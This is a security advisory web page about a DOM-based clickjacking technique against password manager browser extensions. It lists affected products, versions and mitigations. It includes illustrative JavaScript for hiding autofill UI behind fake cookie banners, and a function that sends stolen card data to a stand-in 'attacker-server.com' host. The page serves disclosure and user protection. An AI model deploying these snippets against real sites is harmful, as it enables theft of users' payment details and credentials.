Advisory

Researcher steal passwords from credential managers using new clickjacking method

Take action: Update your password manager browser extension to latest version. This is a weird and possibly difficult attack but if successful can steal your credit cards and passwords with just a few clicks on fake cookie banners or security prompts. If you use 1Password, Bitwarden, iCloud Passwords, LastPass, LogMeOnce, or KeePassXC (which are still vulnerable), consider disabling the browser plugin and use copy/paste instead until they release fixes.

Learn More

Security researcher Marek Tóth is reporting a technique that enabled him to steal data from password managers through "DOM-based Extension Clickjacking". His research tested the browser integration apps of 11 major password managers which are used by approximately 40 million users. He —are vulnerable to a new attack technique 

Unlike traditional clickjacking that targets websites, this method exploits the trusted UI elements that password manager extensions inject directly into web pages. A single click on what appears to be a routine cookie banner or security prompt can expose credit card details, personal information, login credentials, and even two-factor authentication codes to attackers. 

Tested password managers and their browser integrations

  • Dashlane
  • Enpass
  • Keeper
  • NordPass
  • ProtonPass
  • RoboForm
  • 1Password
  • Bitwarden
  • iCloud Passwords
  • LastPass
  • LogMeOnce
  • KeePassXC-Browser

What is the DOM?

The Document Object Model (DOM) is the browser's representation of a web page as a tree structure of elements. When you visit a website, the browser parses the HTML and creates this DOM tree, which JavaScript can then manipulate to add, remove, or modify page elements dynamically. Browser extensions often inject their own elements (like autofill dropdowns) directly into this DOM tree.

Traditional Clickjacking

Clickjacking is a technique where attackers trick users into clicking on something different from what they perceive. The classic method uses invisible iframes:

<!-- Invisible iframe containing target site -->
<iframe src="https://targetsite.com/dangerous-action" style="opacity:0"></iframe>
<!-- Visible decoy button positioned over the iframe -->
<button>Click for Free Gift!</button>

When users click the visible button, they're actually clicking on the hidden iframe, potentially performing unwanted actions on the target site.

DOM-based Extension Clickjacking

The research describes a novel variant that targets browser extensions rather than websites. Instead of using iframes, attackers manipulate extension UI elements that are injected directly into the page's DOM.

Attack Prerequisites and Scenarios

There are two attack scenarios with different prerequisites:

  1. Attacker's Own Website  - the attacker just needs to get users to visit their malicious website. The attack can target credit cards and personal information (not domain-restricted)

  2. Trusted Domain Attack - the attacker must find a vulnerability (XSS, subdomain takeover, etc.) on a trusted domain. The attack can target ;ogin credentials, TOTP codes, and potentially passkey authentication

Step-by-Step Attack Example (Scenario 1: Credit Card Theft)

  • User clicks on a link (perhaps shared on social media) leading to malicious-site.com

  • Attacker creates invisible credit card form 

// Create hidden form with credit card fields
const cardForm = document.createElement('form');
cardForm.innerHTML = `
    <input type="text" autocomplete="cc-number" id="cardnumber">
    <input type="text" autocomplete="cc-exp" id="expiry"> 
    <input type="text" autocomplete="cc-csc" id="cvc">
`;
cardForm.style.opacity = "0.001"; // Nearly invisible
document.body.appendChild(cardForm);

  • The invisible form triggers password manager autofill UI

// Focus on credit card field - this makes password manager show autofill dropdown
document.getElementById('cardnumber').focus();
  • The malicious form hides the password manager UI Invisible
// Method 1: Hide extension elements directly
document.querySelector('[data-extension-root]').style.opacity = "0";

// Method 2: Hide entire page body, show fake background
document.body.style.opacity = "0";
document.documentElement.style.backgroundImage = "url('fake-website-screenshot.png')";

// Method 3: Create overlay that covers extension UI
const overlay = document.createElement('div');
overlay.style = "position:fixed; top:0; left:0; width:100%; height:100%; pointer-events:none;";
document.body.appendChild(overlay);

  • Instead, The attacker shows fake intrusive elements that users expect to interact with: 

    • Cookie consent banner: "Accept All Cookies"

    • Cloudflare security check: "Verify you are human"

    • Newsletter signup: "Close" button

  • When the user clicks "Accept Cookies," they're actually clicking on the invisible password manager autofill dropdown, which fills the hidden form with their credit card details

// Capture the filled data
function stealData() {
    const cardNumber = document.getElementById('cardnumber').value;
    const expiry = document.getElementById('expiry').value; 
    const cvc = document.getElementById('cvc').value;
    
    // Send to attacker's server
    fetch('https://attacker-server.com/steal', {
        method: 'POST',
        body: JSON.stringify({cardNumber, expiry, cvc})
    });
}

After stealing the data, the attacker restores normal page visibility and may redirect to a legitimate site to avoid suspicion.

Traditional clickjacking defenses don't work here because:

  • X-Frame-Options/CSP: Only protect against iframe-based attacks, not DOM manipulation

  • SameSite Cookies: Irrelevant since the extension is injecting UI into the current page context

  • User Authentication: The extension autofill works regardless of whether the user is logged into the target site

There is also a possibility of subdomain exploitation. Password managers by default autofill credentials defined for one domain across all subdomains of that domain. This means that credentials saved for accounts.google.com will autofill on test.dev.sandbox.cloud.google.com. Attackers need to have an exploitable subdomain on anything that has the same domain to steal credentials. Google and Microsoft platforms with many different systems - a lot of them user configurable are very vulnerable because the attack surface is vastly larger than just the primary domain.

Unlike login credentials (which are domain-restricted), credit card and personal information can be stolen from any website. This means attackers don't need any vulnerability on trusted sites - they can steal this sensitive data from their own malicious website.

The research tested 11 major password managers representing ~40 million users and found all were vulnerable in default configurations. The attack requires minimal user interaction (1-4 clicks) and can steal multiple data types in a single session.

Users should update Your Password Manager  and browser plugin:

Fixed 

  • Dashlane (v6.2531.1+)
  • Enpass (6.11.6+)
  • Keeper (17.2.0+)
  • NordPass (5.13.24+)
  • ProtonPass (1.31.6+)
  • RoboForm (9.7.6+)

Still Vulnerable (as of August 2025):

  • 1Password (≤8.11.7.2)
  • Bitwarden (≤2025.8.0)
  • iCloud Passwords (≤3.1.25)
  • LastPass (≤4.146.3)
  • LogMeOnce (≤7.12.4)
  • KeePassXC-Browser (≤1.9.9.2)

If your password manager browser plugin is still vulnerable, disable the browser plugin and use copy/paste.

Researcher steal passwords from credential managers using new clickjacking method
Read More
The Windows June 2023 Patch Tuesday 4 critical …
Foxit PDF releases version that fixes over 50 …
Google Android March 2026 Security Bulletin Patches 129 …
WinRAR vulnerability exploited in malware campaigns
Google patches fourth actively exploited Chrome flaw in …